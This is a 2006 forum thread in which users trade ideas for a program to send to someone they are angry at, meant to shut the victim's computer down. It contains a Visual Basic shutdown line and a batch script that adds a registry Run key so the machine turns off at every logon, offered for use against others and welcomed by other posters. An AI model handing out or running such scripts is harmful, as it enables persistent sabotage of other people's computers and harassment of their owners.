ThyElite Forums

ThyElite Forums (http://www.thyelite.com/forum/index.php)
-   General Talk (http://www.thyelite.com/forum/forumdisplay.php?f=14)
-   -   Pissed at someone? Send them this! (http://www.thyelite.com/forum/showthread.php?t=2653)

kevthedude 08-19-2006 09:58 PM

Quote:

Originally Posted by DefectiveProduct
Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?

Didn't I give you that idea over at l0sers? If you can't move it to the startup folder then you could add the program to the registry. Even worse, 90% of people don't know the location to that registry file. Hell, most people don't even know how to access the registry.

PlasmaShock 08-19-2006 10:00 PM

Quote:

Originally Posted by DefectiveProduct
Better yet, you could make a program that puts itself in the victims startup folder. And in the Form_Load event, you would make the program shut down their computer.

Wouldn't that be a bitch?

the only hard part would be making the program and putting it in the person's startup folder.

DefectiveProduct 08-19-2006 10:07 PM

Quote:

Originally Posted by kevthedude
Didn't I give you that idea over at l0sers? If you can't move it to the startup folder then you could add the program to the registry. Even worse, 90% of people don't know the location to that registry file. Hell, most people don't even know how to access the registry.

And I never figured out exactly how to do that. >_>

Quote:

Originally Posted by PlasmaShock
the only hard part would be making the program and putting it in the person's startup folder.

The only hard part would be to make the program copy itself in the registry/startup folder. Making it shut down the computer is easy. It just takes one line of coding.

Code:

Shell ("SHUTDOWN -S -t 1")

MYMOMMAGOTBEEF 08-19-2006 10:58 PM

Can't you remotely add it to the registery?

TAG 08-19-2006 11:04 PM

LOL, I'm doing to that and posting it on myspace! ROFL!

[EDIT]: I can't save it as a batch file. All I can save it as is a text file.

DefectiveProduct 08-19-2006 11:08 PM

Forgot to mention that it's in Visual Basic 6. :tard:

TAG 08-19-2006 11:11 PM

Wait, everyone, you have to add .bat AFTER the name you want. It's not a file you can save it as.

Example (just save it as this): thefilenameyouwant.bat.

Click save. Just save it as a text file, it will become a bat file.

TAG 08-19-2006 11:29 PM

WHAT THE FUCK. It keeps telling me that another program is using the file.

Sifter 08-20-2006 12:22 AM

Make a Batch file with any name...
Code:

@ECHO off
CLS
ECHO REGEDIT4 >> temp.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> temp.reg
ECHO "ownage"="shutdown.exe -s -t 00" >> temp.reg
REGEDIT.EXE /s temp.reg
SHUTDOWN.EXE -s -t 00

If they are using Windows XP on an admins account, this will make their computer shut off every time they log on to their account.

MYMOMMAGOTBEEF 08-20-2006 12:36 AM

:o OMFG! Thanks for providing us with that sifter :D:D:D. Well duh you have to save it with the extension .bat how else are you going to get a batch file.


All times are GMT -6. The time now is 05:22 PM.

Powered by vBulletin® Version 3.6.8
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.